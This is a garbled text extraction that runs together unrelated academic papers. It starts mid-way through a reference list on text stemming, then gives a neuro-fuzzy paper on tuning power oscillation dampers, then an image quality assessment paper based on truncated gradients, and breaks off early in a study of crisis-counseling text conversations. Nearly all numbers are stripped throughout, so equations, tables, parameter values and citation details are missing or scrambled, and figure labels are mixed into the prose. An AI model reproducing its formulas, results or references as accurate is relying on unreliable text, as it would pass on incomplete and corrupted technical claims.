mitra, and kalyankumar datta. . yass: yet another suffix stripper. acm trans- actions on information systems (tois), ( ): . andrew k mccallum. . mallet: a ma- chine learning for language toolkit. available at: http://mallet.cs.umass.edu. marina meilă. . comparing clusterings by the vari- ation of information. in bernhard schölkopf and man- fred k. warmuth, editors, learning theory and kernel machines, volume of lecture notes in computer science, pages – . springer berlin heidelberg. massimo melucci and nicola orio. . a novel method for stemmer generation based on hidden markov models. in proceedings of the th inter- national conference on information and knowledge management (cikm), pages – . acm. david mimno, hanna m wallach, edmund talley, miriam leenders, and andrew mccallum. . op- timizing semantic coherence in topic models. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. yuhong nan, min yang, zhemin yang, shunfan zhou, guofei gu, and xiaofeng wang. . uipicker: user-input privacy identification in mobile applica- tions. in th usenix security symposium, pages – . chris d paice. . another stemmer. acm sigir forum, ( ): – . martin f porter. . an algorithm for suffix stripping. program, ( ): – . martin f porter. . snowball: a lan- guage for stemming algorithms. available at: http://www.snowball.tartarus.org/texts/introduction.html. sp ruba rani, b ramesh, m anusha, and jgr sathi- aseelan. . evaluation of stemming techniques for text classification. international journal of computer science and mobile computing, ( ): – . evan sandhaus. . the new york times anno- tated corpus. linguistic data consortium, dvd: ldc t . ivan stankov, diman todorov, and rossitza setchi. . enhanced cross-domain document clustering with a semantically enhanced text stemmer (sets). in- ternational journal of knowledge-based and intelli- gent engineering systems, ( ): – . chuan su. . machine learning for reducing the ef- fort of conducting systematic reviews in se. bachelor thesis. kristina toutanova, dan klein, christopher d manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics on human language technology-volume , pages – . association for computational lin- guistics. hanna m wallach, david m mimno, and andrew k mc- callum. . rethinking lda: why priors matter. in advances in neural information processing sys- tems, pages – . international journal of advanced network, monitoring and controls volume , no. , anfis coordination of changes in power oscillation damper parameters with variation in power system operating point dr i. i. alabi department of electrical/electronic engineering nigerian defence academy. kaduna. nigeria e-mail: alabiibitayo@yahoo.com dr a. i. araga, mr sabo aliyu department of electrical/electronic engineering nigerian defence academy. kaduna. nigeria e-mail: araga @gmail.com abstract—in this paper an adaptive neuro-fuzzy controller was designed to adaptively adjust the parameters of a power oscillation damper as the power system operating point changes due to change in operating point in a large interconnected network fitted with facts device and power oscillation damper. as a foundational work the generalized mathematic model of multi-machine power system with embedded facts was developes. the results obtained clearly reveals the effectiveness of this approach. keywords-neuro-fuzzy controller; mathematic model; oscillation damper; interconnected network i. introduction most of the facts based damping controllers belong to the pi (proportional + integral) type and work effectively in single machine system [ ]. however, the performance of the above mentioned damping controllers deteriorates in multi- machine power systems. the damping performance of the facts based damping controllers in multi-machine power systems can be improved by using fuzzy coordinated design [ ]. furthermore power oscillation damper are designed for specific operating point, but operating point changes as demand changes for optimal performance the parameter of power oscillation damper must continually change with changes in operating point for this reason anfis is deployed to predict the future values of pod parameters based on large population of such parameters obtained from all possible operating scenarios. the structure of the proposed adaptive neuro fuzzy coordinated controller is shown in figure , where the inputs are speed deviation of synchronous machines and their acceleration. thus, the conventional damping controllers are adaptively tuned by using anfis controllers. w w st st k  lag lead st st   lag lead st st   anfis pod adaptive parameter leadt lag t operating conditions 𝑉𝑝𝑜𝑑 𝑖 𝑈 𝑖 𝑃𝑖 𝑄𝑖 𝑉 𝑖 figure . proposed adaptive pod controller ii. literature review an attempt has been made to apply hybrid neuro-fuzzy approach for the coordination between the conventional power oscillation damping (pod) controllers for multi- machine power systems. with the help of matlab, a class of adaptive networks, that are functionally equivalent to fuzzy inference systems, is proposed. the proposed architecture is referred to as anfis (adaptive neuro-fuzzy inference system) [ ]-[ ]. an adaptive fuzzy inference system (anfis) based upfc supplementary damping controller to superimpose the damping function on the control signal of upfc for damping of power system electromechanical oscillations was proposed in [ ]-[ ]. the acronym anfis derives its name from adaptive neuro-fuzzy inference system. using a given input/output data set, the toolbox function anfis constructs a fuzzy inference system (fis) whose membership function parameters are tuned (adjusted) using either a back propagation algorithm alone, or in combination with a least squares type of method. this allows fuzzy systems to learn from the data they are modeling [ ]. it has a network-type structure similar to that of a neural network. thus, it maps inputs through input membership functions and associated doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , parameters and then through output membership functions and associated parameters to outputs, can be used to interpret the input/output map. the parameters associated with the membership functions will change through the learning process. the computation of these parameters (or their adjustment) is facilitated by a gradient vector, which provides a measure of how well the fuzzy inference system is modeling the input/output data for a given set of parameters [ ]-[ ]. once the gradient vector is obtained, any of several optimization routines could be applied in order to adjust the parameters so as to reduce some error measure (usually defined by the sum of the squared difference between actual and desired outputs) [ ]-[ ]. iii. proposed method a. fuzzy system modeling and controller philosophy input output x n x y   n y unknown system figure . an unknown system as a black box in the unknown system in figure only a set of input, and output can be measured. the mathematical description relating the input to the output can be a mathematical formula, such as a mapping or a function that relates the input to the output in the form          or a set of differential equations in the form            or a logical linguistic statement which can be quantified mathematically in the form: if (input ) and … and (input ) ( ) then (output ) and …. and (output ) fuzzy systems modeling is to quantify the logical form of equation ( . ) by using fuzzy logic and the mathematical functional model of equation ( . ) or by using fuzzy logic together with the differential equation model of equation ( . ). the fuzzy logic controller comprises of four stages: fuzzification, a knowledge base, decision making and defuzzification. the fuzzification interface converts input data into suitable linguistic values that can be viewed as label fuzzy sets. to obtain a deterministic control action, a defuzzification strategy is required. defuzzification is a mapping from a space of fuzzy control actions defined over an output universe of discourse into a space of nonfuzzy (crisp) control actions. the defuzzification of the variables into crisp outputs is tested by using the weighted average method. after generating the fuzzy inference, the generated information describing the model’s structure and parameters of both the input and output variables are used in the anfis training phase. this information will be fine-tuned by applying the hybrid learning or the backpropagation schemes. the algorithm employed for anfis training is shown in figure . international journal of advanced network, monitoring and controls volume , no. , invoke the command line anfis training routine and provide the following input argument: epoch number, genfis output, and the training data plot the training data and the output is output satisfactory ? end yes increase no of member function and epoch number start generate input/ output training data set the genfis input parameters:number of membership functions, membership function type e.t.c no plot the output membership function and the input/output data figure . flowchart of anfis training iv. results and discussions power oscillation dampers were designed for upfc embedded in two test case study systems: a) kundur two area system b) nigerian kv national grid however the optimal performance of these pods are only guaranteed at the particular operating points under consideration, but at any other operating points, different values of time constant must be determined for the damping to be effective a. result of anfis training (test system ) the training data and check data are generated by randomly varying the load (multiplying the load with a factor of . ) in the two areas of the test system. at each operating point the actual values of pod parameters were calculated. the anfis parameter settings are as shown in table . fig is the plot of training data and anfis output for lead time constant while figure is the graph of check data and anfis output for lead time constant. the plot of the error associated with the training is shown in figure for both the check data and training data. the corresponding plots for lag time constant are shown in figures to figure . table i. anfis parameter settings nummfs mftype 'gbellmf' epoch_n international journal of advanced network, monitoring and controls volume , no. , figure . training data and anfis output: lead time constant figure . check data and anfis output: lead time constant figure . prediction error for training data and check data: lead time constant . . . . . . . . . . . . . . . . . modulus of eigenvalue le ad t im e co ns ta nt plot of training data and anfis output:lead time constant training data anfis output . . . . . . . . . . . . . . . . . . plot of check data and anfis output:lead time constant le ad t im e co ns ta nt modulus of eigenvalue check data anfis output . . . . . . . . . . - - x - training data error for lead time constant er ro r modulus of eigenvalue . . . . . . . . . . . - x - check data error for lead time constant er ro r modulus of eigenvalue international journal of advanced network, monitoring and controls volume , no. , figure . training data and anfis output: lag time constant figure . check data and anfis output: lag time constant figure . prediction error for training data and check data: lag time constant b. result of anfis training (test system ) the data for training were obtained by randomly varying the load in different areas by a factor of . from low to medium and high values for about scenarios, the data were divided into training data and check data. the lead-lag time constants were recorded as they change with operating conditions as well as the lead and lag time constants that provide the best damping under different operating conditions. the results obtained for lag time constant are as shown in figures to . figure to are the corresponding results for lead time constant. figure is the graph of the input membership function while figures and are the graphs of the anfis adjusted membership function that gives the exact simulation of the training data for the lag time constant and lead time constant respectively. . . . . . . . . . . . . . . . . . . . . modulus of eigenvalue la g t im e co ns ta nt plot of training data and anfis output:lag time constant anfis output training data . . . . . . . . . . . . . . . . . . . . . modulus of eigenvalue la g ti me c on st an t plot of check data and anfis output:lag time constant anfis output check data . . . . . . . . . . - - . . x - training data error for lag time constant e r r o r modulus of eigenvalue . . . . . . . . . . . - x - check data error for lag time constant e r r o r modulus of eigenvalue international journal of advanced network, monitoring and controls volume , no. , figure . plot of anfis data and training data: lag time constant figure . plot of anfis data and check data: lag time constant figure . prediction error for training data and check data . . . . . . . . . . . . modulus of eigenvalue la g t im e co ns ta nt plot of training data and anfis output:lag time constant training data anfis output . . . . . . . . . . . modulus of eigenvalue la g t im e co ns ta nt plot of check data and anfis output:lag time constant anfis output check data . . . . - - x - check data error for lag time constant e r r o r modulus of eigenvalue . . . . . . . . - - . . x - training data error for lag time constant e r r o r modulus of eigenvalue international journal of advanced network, monitoring and controls volume , no. , figure . plot of anfis output and training data: lead time constant figure . plot of anfis data and check data: lead time constant figure . prediction error for training data and check data figure . input membership function . . . . . . . . . . . . . . . . . . . modulus of eigenvalue le ad t im e co ns ta nt plot of training data and anfis output:lead time constant anfis output training data . . . . . . . . . . . modulus of eigenvalue le ad t im e co ns ta nt plot of check data and anfis output:lead time constant anfis output check data . . . . - x - check data error for lead time constant er ro r modulus of eigenvalue . . . . . . . . - - . . x - training data error for lead time constant er ro r modulus of eigenvalue . . . . . . . . . . . . input: modulus of eigenvalues de gr ee o f me mb er sh ip in mf in mf in mf in mf in mf international journal of advanced network, monitoring and controls volume , no. , figure . anfis adjusted membership function: lag time constant figure . anfis adjusted membership function: lead time constant v. conclusion in this work an adaptive neuro fuzzy controller has been developed for the purpose of coordinating the changes in power oscillation damper parameters with variation in power system operating point. the accuracy with which the controller was able to predict the values of pod parameters clearly reveals the effectiveness of the proposed approach. references [ ] chia, b.h.k., s. morris and p.k. dash, . “a fuzzy-feedback linearizing nonlinear control of csi based statcom for synchronous generator stabilization”, proceedings of the ieee international conference on control applications, vol. , september, pp - . [ ] external neuro-control for a series capacitive reactance compensator based on a voltage source pwm converter in damping power oscillations”, ieee transactions on industrial electronics, vol. , no. , february , pp. - . [ ] j. r. jang, “anfis adaptive-netwok-based fuzzy inference system”, ieee transactions on systems, man and cybernetics, vol. , no. , , pp. - . [ ] s. p. ghoshal, “multi-area frequency and tie-line power flow control with fuzzy logic based integral gain scheduling”, ie (i) journal-ei, vol. , december , pp. - . [ ] fuzzy logic toolbox—for use with matlab, the mathworks inc, . [ ] t. r. sumithira and a. nirmal kumar, “elimination of harmonics in multilevel inverters connected to solar photovoltaic systems using anfis: an experimental case study”, journal of applied research and technology, vol. , no. , february , pp. - . [ ] jyh-shing roger jang.: ‘anfis: adaptive-network-based fuzzy inference system’, ieee trans. syst. man and cyber., , ( ), ,pp. - [ ] e.v. larsen, juan.j, sanchez-gasca and chow.j.h.‘concept for design of facts controllers to damp power swings’, ieee transactions ,pwrs- ( ), pp. - . [ ] c r houck, j joines and m kay.” genetic algorithm optimization toolbox, user’s manual” version . , [ ] jang, j.-s. r. and n. gulley, "gain scheduling based fuzzy controller design," proc. of the international joint conference of the north american fuzzy information processing society biannual conference, the industrial fuzzy control and intelligent systems conference, and the nasa joint technology workshop on neural network and fuzzy logic, san antonio, texas, dec. . [ ] jang, j.-s. r. and c.-t. sun, "neuro-fuzzy modeling and control, proceedings of the ieee, march . [ ] jang, j.-s. r. and c.-t. sun, neuro-fuzzy and soft computing: a computational approach to learning and machine intelligence, prentice hall, . [ ] kaufmann, a. and m.m. gupta, introduction to fuzzy arithmetic, v.n. reinhold, . . . . . . . . . . . . . input: modulus of eigenvalues de g re e o f m em be rs hi p in mf in mf in mf in mf in mf adjusted membership functions: lag time constant . . . . . . . . . . . . input: modulus of eigenvalues de gr ee of m em be rs hip in mf in mf in mf in mf in mf anfis adjusted membership function: lead time constant paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - adaptively truncating gradient for image quality assessment minjuan gao school of electrical and control engineering shaanxi university of science & technology xi’an, china e-mail: gaominjuan @ .com hongshe dang school of electrical and control engineering shaanxi university of science & technology xi’an, china e-mail: @qq.com xuande zhang school of electronic information and artifificial intelligence shaanxi university of science & technology xi’an, china e-mail: @qq.com abstract—objective image quality assessment (iqa) aims to develop computational models to predict the perceptual image quality consistent with subjective evaluations. as image information is presented by the change in intensity values in the spatial domain, the gradient, as a basic tool for measuring the change, is widely used in iqa models. however, does the change measured by the gradient actually correspond to the change perceived by the human visual system (hvs)? to explore this issue, in this paper, we analyze how the ability of the hvs to perceive changes is affected by the upper threshold, and we propose an iqa index based on an adaptively truncating gradient. specifically, the upper threshold at each pixel in an image is adaptively determined according to the image content, and the adaptively truncating gradient is obtained by retaining the part of the gradient magnitude that is less than the upper threshold and truncating the part that is greater than the upper threshold. then, the distorted image quality is calculated by comparing the similarity of the adaptively truncating gradient between a reference image and the distorted image. experimental results on six benchmark databases demonstrate that the proposed index correlates well with human evaluations. keywords-image quality assessment; human visual system; upper threshold; truncating gradient i. introduction image quality assessment deals with the quantitative evaluation of the quality of images and can be widely used in image acquisition, compression, storage, transmission and other image processing systems. generally, human beings are the ultimate receivers of images. subjective evaluation by humans is a reliable iqa method, but it is cumbersome and difficult to apply in real-world scenarios. an objective iqa method aims to design mathematical models to automatically measure the image quality in a way that is consistent with human evaluations. according to the availability of ground-truth images, objective iqa indices fall into three categories: full-reference (fr), reduced-reference (rr) and no-reference (nr) models [ ]. in this paper, the discussion is focused on fr models. at present, there are two popular techniques for constructing fr models: knowledge-based and learning-based techniques. the deep learning method learns the evaluation model in an end-to-end manner, and its "black-box" lacks explanation. furthermore, this approach requires a large number of training samples, but the cost of obtaining high-quality and mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , convincing samples is relatively high. currently, the commonly used method for obtaining samples is still data augmentation. in this work, we emphasize the knowledge-based approach, which uses knowledge about the hvs to heuristically construct iqa models. investigating these models reveals that the gradient feature is widely employed. in analyzing the relationship between the gradient feature and the iqa task, the gradient has at least the following two characteristics. . the information contained in natural images is presented by changes in intensity value or color in the spatial domain. in extreme cases, the constant image (smoothness) and the pure noise image (variation in all directions) cannot convey any information. thus, the feature of measuring change is widely used in iqa, with the gradient as the basic tool for measuring change. . the judgment of the image quality level in iqa is different from the classic discrimination task. the features for discrimination tasks, such as face recognition and fingerprint recognition, should be robust to image distortion, while the features for iqa should be sensitive to image distortion. the gradient feature is sensitive to image distortion and image content but is weak in robustness. representative fr models using the gradient feature include the feature similarity index (fsim) [ ], gradient magnitude similarity deviation index (gmsd) [ ], superpixel-based similarity index (spsim) [ ] and directional anisotropic structure metric (dasm) [ ]. in the fsim and gmsd, the image gradient magnitude is employed as the fundamental feature. spsim is computed on the basis of three features: superpixel luminance, superpixel chrominance and pixel gradient. the dasm is obtained by incorporating the gradient magnitude, anisotropy and local directivity features. objective iqa models are designed by simulating the behaviors of the hvs, which integrates perception, understanding and assessing functions, that is, humans evaluate the image quality in the hvs perception space. therefore, the features for iqa should be the subjective quantity perceived by the hvs. the gradient is often directly used in iqa models as an effective feature to measure change; however, does the change measured by the gradient actually correspond to that perceived by the hvs? in fact, the change measured by the gradient belongs to the objective quantity (objective physical stimulus), while that perceived by the hvs belongs to the subjective quantity (subjective response). thus, how can one map the objective quantity to the subjective quantity? this mapping function is nonlinear, and it is difficult to accurately describe its form. empirically, the ability of the human perception system to sense changes has a certain upper threshold. when the objective change exceeds the upper threshold, the subjective change increases insignificantly in situations such as the human perception of changes in salt- solution saltiness, at an outside temperature, and in the weight of objects carried. in this paper, we discuss the ability of the hvs to perceive changes affected by the upper threshold by employing the adaptively truncating gradient to measure the change perceived by the hvs. we propose an iqa index based on the adaptively truncating gradient. specifically, the upper threshold at each pixel in the image is adaptively determined according to the image content, and the adaptively truncating gradient is obtained by retaining the part of the gradient magnitude that is less than the upper threshold and truncating the part that is greater than the upper threshold. experimental results on public databases show that the proposed index correlates well with the subjective judgments. ii. an iqa index based on adaptively truncating gradient a. definition of adaptively truncating gradient the image information is presented by the change in the intensity values in the spatial domain, and this change may be destroyed by degradation of the image quality. the gradient feature can effectively measure the change and is widely used in iqa algorithms. the image gradient can be obtained by convolving the image with a gradient operator, such as sobel, roberts and scharr and prewitt. usually, a different gradient operator for the iqa model may yield distinguished performance. this problem was discussed in [ , ], where the experiment results showed that the scharr operator can obtain a slightly better performance than the others. here, we adopt a × scharr operator whose templates along the horizontal (h) and vertical (v) directions take the following form:               hh ,             vh denote  ni rrr ,,,,r   for a reference image and  ni ddd ,,,,d   for a distorted image, where i is the pixel index, and n is the number of total pixels. the image gradients in the horizontal and vertical directions can be obtained by convolution of the image with hh and vh , and the gradient magnitude is international journal of advanced network, monitoring and controls volume , no. , computed from their root mean square. the gradient magnitudes of r and d at each pixel i , denoted as  ig ,r and  ig ,d , are calculated as          iiig vh hrhr,r  ( )          iiig vh hdhd,d  ( ) where the symbol  denotes the convolution operation. the image gradient only reflects the objective changes in images. since human evaluation of image quality is carried out in the hvs perception space, the image features extracted for iqa models should reflect the subjective changes perceived by the hvs. we consider that the ability of hvs to perceive changes is subject to the upper threshold. when the objective change exceeds the upper threshold, the subjective change does not obviously increase. in this study, we define the adaptively truncating gradient to measure the subjective change sensed by the hvs. denote t as the upper threshold. we define a truncating function )(trunc . for any given variable x , it is retained when it is less than t and truncated when it is greater than t . the specific expression is         txx txt xtrunc if if , , ( ) the truncating gradients of r and d at each pixel i are denoted as  igt ,r and  igt ,d , and the upper threshold at this point is denoted as  it . using formula ( ), the calculation of  igt ,r is as follows:                       itigig itigit igtruncigt ,r,,r ,r, ,r,r if if ( ) in eq. ( ), if the value of  ig ,r is greater than  it , then  ig ,r will be truncated, and the truncating gradient  igt ,r is set to  it . that is, the part of the gradient magnitude that is greater than the upper threshold is masked. otherwise,  ig ,r is not be masked, and the truncating gradient  igt ,r is set equal to  ig ,r . that is, the part of the gradient magnitude that is less than the upper threshold can be perceived by the hvs. similarly, using formula ( ),  igt ,d is calculated as follows:                       itigig itigit igtruncigt ,d,,d ,d, ,d,d if if ( ) obviously, for the calculation of the truncating gradients  igt ,r and  igt ,d in eq. ( ) and ( ), the selection of the upper threshold  it is very important. according to weber’s law, the ratio of the stimulus change that causes a just noticeable difference (jnd) from the original stimulus intensity is a constant. in psychology, the hvs has the property of light adaptation, and the perception of luminance obeys weber’s law [ ]. the just noticeable incremental luminance over the background by the hvs is related to the background luminance. inspired by this recognition, in contrast to weber’s law, we consider that the upper threshold for truncating the significantly perceptible stimulus change is also related to the original stimulus intensity value. because different pixels in the image correspond to different gray values, the original stimulus intensity values will also be different. here, we adaptively determine the upper threshold according to the background luminance of different areas of the image. the adaptively upper threshold is defined as     t ii it  ( ) where t is an adjustable threshold parameter. (the details of selecting t will be presented in section Ⅲ- a.)  ii takes the larger value of the luminance of r and d at point i.       idirm axii , ( ) in formula ( ), the luminance values  ir and  id at pixel i of r and d is estimated by formulas ( ) and ( ). for reference image r , denote the square neighborhood as r iΩ with center of pixel i and radius international journal of advanced network, monitoring and controls volume , no. , of t , and let the intensity value of any pixel in the neighborhood be ji r , , r ij Ω . similarly, for the distorted image, denote the square neighborhood as d iΩ with center of pixel i and radius of t , and let the intensity value of any pixel in the neighborhood be jid , , d ij Ω .      m j jir m ir , ( )      m j jid m id , ( ) where    tm . based on eq. ( ), the value of the upper threshold at each pixel in an image can be adaptively determined according to the image content. then, the adaptively truncating gradient is obtained by formulas ( ) and ( ). figure shows the gradient map and the adaptively truncating gradient map corresponding to the reference image and the distorted image. it can be seen that the maximum amplitude of the gradient map is approximately , while the maximum amplitude of the adaptively truncating gradient is approximately . (a) (b) (c) (d) (e) (f) figure . the gradient map and the adaptively truncating gradient map corresponding to the reference image and the distorted image. (a) the reference image. (b) the distorted image. (c) and (d) are the gradient map of (a) and (b) , respectively. (e) and (f) are the adaptively truncating gradient map of (a) and (b) , respectively. b. the proposed iqa index with the adaptively truncating gradient defined, the local quality of the distorted image is predicted by the similarity between the adaptively truncating gradient of r and d, which is defined as           cigig cigig is tt tt    ,d,r ,d,r ( ) where the parameter c is introduced to avoid the denominator becoming zero and supplies numerical stability. the range of  is is from to . obviously, on the one hand,  is is close to when  igt ,r and  igt ,d are quite different. on the other hand,  is will achieve the maximal value when  igt ,r is equal to  igt ,d . the overall quality score of the distorted image is predicted by the local quality  is , which is calculated as follows :     n i is n score ( ) a higher score indicates better image quality. iii. experimental results a. experimental setup all the experiments in this study were implemented in matlab r b and executed on a lenovo ideapad laptop with intel core i - hq@ . - international journal of advanced network, monitoring and controls volume , no. , ghz cpu and gb ram. several well-known fr metrics were used when comparing performances with the proposed method, including psnr, ssim[ ], fsim [ ], gmsd[ ], dasm[ ], ifc [ ], vif [ ], ms-ssim [ ], and ssrm [ ]. to widely evaluate the performance of these metrics, six public databases were employed for the experiments: tid [ ], tid [ ], csiq [ ], live [ ], ivc [ ] and a [ ]. the tid database consists of reference images and a total of distorted images, each of which is distorted using different types of distortions at four different levels of distortion. the tid is an expanded version of tid , which contains distorted images with distortion types. the live database includes reference images and distorted images with five distortion types. the csiq database contains original images and distorted images degraded by six types of distortion. the ivc database consists of reference images and distorted images. the a database includes reference images and distorted images. note that for the color images in these databases, only the luminance component is evaluated. four commonly used performance criteria are employed to evaluate the competing iqa metrics. the spearman rank order correlation coefficient (srocc) and kendall rank order correlation coefficient (krocc) are adopted for measuring the prediction monotonicity of an objective iqa metric. for compute the other two criteria, the pearson linear correlation coefficient (plcc) and the root mean squared error (rmse), we need to apply a regression analysis. the plcc measures the consistency between the objective scores after nonlinear regression and the subjective mean opinion scores (mos). the rmse measures the relative distance between the objective scores after nonlinear regression and mos. for the nonlinear regression, we used the following mapping function:   βqβ e βq βqβp          ( ) where q and pq are original objective scores of an iqa metric and the objective scores after regression, respectively. iβ , , , , i are the fixed parameters. higher values of srocc, krocc, plcc and lower rmse values indicate a better performance of iqa metrics. for the proposed metric, there are three parameters that need to be set to obtain the final quality score. they are t , t and c . selecting the first reference images and corresponding distorted images in the tid database as the testing subset, we choose the parameters that can yield the highest srocc. the result is t , t and c . to further analyze the effect of threshold parameter t , more experiments were carried out. figure shows the srocc performance with different t values on six databases. on most databases, srocc can is best when t is . this result indicates that the range of upper threshold t is approximately [ , / ] for an - bit grayscale image according to formula ( ). if the change in image intensity is above / , then it will be masked in visual perception. figure . srocc performance with different t values on six databases b. performance comparison table Ⅰ lists the srocc, krocc, plcc and rmse results of ten metrics on six databases, and the two best results of each row are highlighted in bold. overall, the methods which employed the gradient feature performs well across all the databases, such as fsim, gmsd, dasm and the proposed metric. this partly demonstrates the validity of considering the degradation of gray changes in quality evaluation. furthermore, the proposed metric performs well, outperforming ssim and ssrm and competing with fsim and gmsd. international journal of advanced network, monitoring and controls volume , no. , table i. comparison the performance results of ten iqa metrics on six public databases. the first two are marked in bold database criteria psnr ssim ( ) ms-ssim ( ) ifc ( ) vif ( ) fsim ( ) gmsd ( ) dasm ( ) ssrm ( ) proposed tid srocc . . . . . . . . . . krocc . . . . . . . . . . plcc . . . . . . . . . . rmse . . . . . . . . . . tid srocc . . . . . . . - . . krocc . . . . . . . - . . plcc . . . . . . . - . . rmse . . . . . . . - . . live srocc . . . . . . . . . . krocc . . . . . . . . . . plcc . . . . . . . . . . rmse . . . . . . . . . . csiq srocc . . . . . . . . . . krocc . . . . . . . . . . plcc . . . . . . . . . . rmse . . . . . . . . . . ivc srocc . . . . . . . . . . krocc . . . . . . . . . . plcc . . . . . . . . . . rmse . . . . . . . . . . a srocc . . . . . . . . . . krocc . . . . . . . . . . plcc . . . . . . . . . . rmse . . . . . . . . . table ii. comparison srocc for individual distortion of ten iqa metrics on tid database. the first two are marked in bold database distortion type psnr ssim ( ) ms-ssim ( ) ifc ( ) vif ( ) fsim ( ) gmsd ( ) dasm ( ) ssrm ( ) proposed tid awgn . . . . . . . . . . awgn-color . . . . . . . . . spatial-correlated . . . . . . . . . . mask-noise . . . . . . . . . . hf-noise . . . . . . . . . . impulse-noise . . . . . . . . . . quantization-noise . . . . . . . . . . gb . . . . . . . . . . denoising . . . . . . . . . . jpeg . . . . . . . . . . jp k . . . . . . . . . . jpeg-trans-error . . . . . . . . . . jp k-trans-error . . . . . . . . . . pattern-noise . . . . . . . . . . block-distortion . . . . . . . . . . mean-shift . . . . . . . . . . contrast change . . . - . . . . . . . saturation change . - . - . - . - . - . - . . - . - . multiple-noise . . . . . . . . . . comfort-noise . . . . . . . . . . noisy-compression . . . . . . . . . . color quantization . . . . . . . . . . chromatic abbr. . . . . . . . . . . sparse sample . . . . . . . . . . international journal of advanced network, monitoring and controls volume , no. , among the six databases, tid has the highest number of distorted types. table Ⅱ lists the srocc results of ten metrics about each individual distorted type of the tid database. the proposed algorithm performs well in variety of distortion types. in particular, the proposed algorithm is outstanding for jpeg, jp k and jpeg-trans-error distortion types that are sensitive to variations. iv. conclusion in this paper, we discuss the problem of whether the change measured by the gradient correspond to the change perceived by the hvs. considering that the ability of the hvs to perceive changes is affected by the upper threshold, we defined the adaptively truncating gradient and proposed a novel iqa index. numerical experimental results showed that this index performs well on multiple databases. in addition, more studies need to be conducted to address this problem due to its complexity. in future research, we expect to using machine learning methods to further understand this issue. acknowledgment this work was supported by the natural science foundation of shaanxi province under grant jm- . references [ ] z. wang, a. c. bovik, h. r. sheikh, and e. p. simoncelli, “image quality assessment: from error visibility to structural similarity,” ieee trans. image process., vol. , no. , pp. – , apr. . [ ] l. zhang, l. zhang, x. mou, and d. zhang, “fsim: a feature similarity index for image quality assessment,” ieee trans. image process., vol. , no. , pp. – , aug. . [ ] w. xue, l. zhang, x. mou, and a. c. bovik, “gradient magnitude similarity deviation: a highly effificient perceptual image quality index,” ieee trans. image process., vol. , no. , pp. – , feb. . [ ] w. sun, q. liao, j. xue, and f. zhou, “spsim: a superpixel-based similarity index for full-reference image quality assessment,” ieee trans. image process., vol. , no. , pp. – , sept. . [ ] l. ding, h. huang, and y. zang, “image quality assessment using directional anisotropy structure measurement,” ieee trans. image process., vol. , no. , pp. – , apr. . [ ] x. zhang, x. feng, w. wang, and w. xue, “edge strength similarity for image quality assessment,” ieee signal process. lett., vol. , no. , pp. – , apr. . [ ] z. wang and a. c. bovik, “bottom-up approaches for full-reference image quality assessment ,” in modern image quality assessment, vermont, vt, usa: morgan and claypool, , pp. – . [ ] h. r. sheikh, a. c. bovik, and g. de veciana, “an information fifidelity criterion for image quality assessment using natural scene statistics,” ieee trans. image process., vol. , no. , pp. – , dec. . [ ] h. r. sheikh and a. c. bovik, “image information and visual quality,” ieee trans. image process., vol. , no. , pp. – , feb. . [ ] z. wang, e. p. simoncelli, and a. c. bovik, “multi-scale structural similarity for image quality assessment,” in proc. ieee asilomar conf. signals, syst. comput., nov. , pp. – . [ ] a. ahar, a. barri and p. schelkens, "from sparse coding significance to perceptual quality: a new approach for image quality assessment," ieee trans. image process., vol. , no. , pp. - , feb. . [ ] n. ponomarenko, o. ieremeiev, v. lukin, k. egiazarian, l. jin, j, astola, b. vozel, k. chehdi, m. carli, f. battisti, and c.-c. jay kuo, “color image database tid : peculiarities and preliminary results,” in proc. th eur. workshop vis. inf. process., jun. , pp. – . [ ] n. ponomarenko, v. lukin, a. zelensky, k. egiazarian, m. carli, and f. battisti, “tid a database for evaluation of full-reference visual quality assessment metrics,” adv. modern radioelectron., vol. , pp. – , may. . [ ] c. larson and d. m. chandler, categorical image quality (csiq) database [online]. available: http://vision.okstate.edu/csiq [ ] h. r. sheikh, k. seshadrinathan, a. k. moorthy, z. wang, a. c. bovik, and l. k. cormack, image and video quality assessment research at live [online]. available: http://live.ece.utexas.edu /research /quality [ ] a. ninassi, p. le callet, and f. autrusseau, subjective quality assessment ivc database [online]. available: http://www .irccyn. ecnantes.fr/ivcdb [ ] d. m. chandler and s. s. hemami, a database [online]. available: http://foulard.ece.cornell.edu/dmc /vsnr/vsnr.htm large-scale analysis of counseling conversations: an application of natural language processing to mental health tim althoff∗, kevin clark∗, jure leskovec stanford university {althoff, kevclark, jure}@cs.stanford.edu abstract mental illness is one of the most pressing pub- lic health issues of our time. while counsel- ing and psychotherapy can be effective treat- ments, our knowledge about how to conduct successful counseling conversations has been limited due to lack of large-scale data with la- beled outcomes of the conversations. in this paper, we present a large-scale, quantitative study on the discourse of text-message-based counseling conversations. we develop a set of novel computational discourse analysis meth- ods to measure how various linguistic aspects of conversations are correlated with conver- sation outcomes. applying techniques such as sequence-based conversation models, lan- guage model comparisons, message cluster- ing, and psycholinguistics-inspired word fre- quency analyses, we discover actionable con- versation strategies that are associated with better conversation outcomes. introduction mental illness is a major global health issue. in the u.s. alone, . million adults ( . %) experience mental illness in a given year (national institute of mental health, ). in addition to the person di- rectly experiencing a mental illness, family, friends, and communities are also affected (insel, ). in many cases, mental health conditions can be treated effectively through psychotherapy and coun- seling (world health organization, ). however, it is far from obvious how to best conduct counsel- ing conversations. such conversations are free-form without strict rules, and involve many choices that *both authors contributed equally to the paper. could make a difference in someone’s life. thus far, quantitative evidence for effective conversation strategies has been scarce, since most studies on counseling have been limited to very small sample sizes and qualitative observations (e.g., labov and fanshel, ( ); haberstroh et al., ( )). how- ever, recent advances in technology-mediated coun- seling conducted online or through texting (haber- stroh et al., ) have allowed counseling ser- vices to scale with increasing demands and to col- lect large-scale data on counseling conversations and their outcomes. here we present the largest study on counseling conversation strategies published to date. we use data from an sms texting-based counseling service where people in crisis (depression, self-harm, sui- cidal thoughts, anxiety, etc.), engage in therapeutic conversations with counselors. the data contains millions of messages from eighty thousand counsel- ing conversations conducted by hundreds of coun- selors over the course of one year. we develop a set of computational methods suited for large-scale dis- course analysis to study how various linguistic as- pects of conversations are correlated with conversa- tion outcomes (collected via a follow-up survey). we focus our analyses on counselors instead of individual conversations because we are interested in general conversation strategies rather than prop- erties of specific issues. we find that there are sig- nificant, quantifiable differences between more suc- cessful and 